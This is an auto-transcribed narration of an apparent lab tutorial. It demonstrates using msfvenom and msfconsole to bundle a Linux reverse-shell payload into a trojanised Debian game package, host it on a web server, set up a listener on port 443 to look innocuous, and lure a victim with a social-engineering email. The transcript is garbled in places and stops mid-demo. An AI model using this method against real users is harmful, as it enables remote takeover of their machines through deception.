Okay, so now we're gonna use the MSF venom command.
Do help real quick. We can see what kind of options this command takes.
So as we can see, this is a standalone payload. Generator
replaces MSF payload, understaffed and coat.
Uh, it's got a kind of bundled that the other functionality into this one, this one tool
So we can specify which Palin we want to use. We can look a different. Uh, I'll put four minutes. Choose the architecture.
We can also eliminate characters to avoid which we do have to do for this particular example.
And the command is kind of lengthy to type in.
Make my window a little bit bigger
But I'll explain the options that we that we need as we go through this.
All right, so I'm sf
and I need to tell it that market texture is X 86 looks
and I will specify my p load. So it's a linens payload,
I already looked up this path, so I know this is here, but you might have to, uh,
go into your payloads and do some searches to find the right payload to use this should work on a debian Linux system
that as long as it's x 86 architecture. If it was a nd architecture or not, specify different architecture for Dash A as well as the payload would be different.
Now I'm gonna specify my local host
and that is 100 to 1 68
They I'm gonna specify the local port
and I'm gonna use 443 That way, it doesn't look like a suspicious port. When the victim's systems connected to this website,
I'm going to exclude
This example needs this. It's kind of a technical discussion to why we need to exclude that. But sometimes when you're encoding a payload, certain characters cause problems with compatibility.
So this one I know I need to exclude this. You may have to do your own research, And although the trial and error to get
you're encoding process to work correctly,
my output format is going to be elf.
well, Well, look at the, uh that this help for four minutes to look at the list after I generate the payload.
And then my output file. So route
and then I want user games.
Well, that's part of the package. I'm replacing it with my file
that has this payload bundled into it.
So running the command, this takes a few seconds, and it tells me that it was able Thio encode
with the Chicago again. I
encoder, they're popular. Encoder works quite often, and it tells me that it was 98 bites
and was able to, uh,
Payload. So look at the four natural quick.
So there's executed all formats
and then transformation formats.
So execute formats. I've got a lot of different options here.
LF it just happens to be the one that works correctly for this example, So just gonna have to trust me on that.
All right? Now what I need to do is start my Web server.
You want to make sure that I've got the web page
in place, or rather available? When I want Thio
get the victim to click a link which helps them to visit the website.
All right, so now mine. My next step is to create a handler. So the victim's system is going to be. When they install the package, they will generate a
a reverse shell back to the attacker machine. So I need to have a handler to listen for this connection.
And I could do this from a
another command command line option using MSF Counsel
do help for this real quick
and we see For NSF Consul, I can specify lots of different options
to run commands from the command line without having to get into the console framework itself.
And we're gonna tell a, for instance, that it wanted to be in a quiet mode, So we don't see the start of banner and then I'll specify the commander want to execute.
And you, I'll enclose that adult quote so so runs as a complete grant.
and I'm gonna say use exploit,
And if I can, if I separate my commands with a semi colon, I can run several commands on
and on one line effectively. So it's a nice way to to do
a lot of work with one simple command. Of course, if you were doing this kind of work regularly, you would save these commands and
in a file which you so you can just copy and paste them. Or you can find them in your shell history as well.
All right, so now I want to set the payload.
Helps if you spell right.
Okay. Payload is going to be Lennox because we know it's a Lennox machine.
my, uh, shell, if you recall, was an x 86 shell
reverse TCP. So this has to match the people that I encoded so that the handler a shovel connect to the proper handler. Then the connection should work.
I need to sent my local host.
And that's gonna be 1 to 1 68 1 Oops. 26 1 29 So that's the attacker system.
You sent my local port.
And that's gonna be 443 Have we previously seen
And then lastly, I will exit with the dash. Why? So that it doesn't prompt me for
so when this finishes running, it should tell me that it's binding to my current address.
So my local hoses want 194443
I see which pay for what? I've got my local host, my local port. And now the handler is running
website because I started up my default Apache service
Now, what I need to do is go to my victim system
and start up my web browser. So go ahead and launch ice weasel.
I can verify that the Web server is there by
typing in its address.
And there's my default pains that you get when Debbie installs Apache.
So I know the websites reachable
and has an engine before, through social engineering techniques, you would send an email to the victims. Say, Hey, uh, try this new mind sweeper came that I created call X bomb was a lot of fun. Maybe show some screen shots, make it look interesting.
What we're gonna do is, uh,
get the file directly by using the W get command.
So I'm going to specify my address.
This could be in the link, of course, that you would send to your
I have to make sure I get this exactly right.
Tue dot to a dash one.
Underscore I 3 86 dot Deborah.
Well, you double check that.
All right, so on the victim machine, they click the link.
It's not what I was expecting.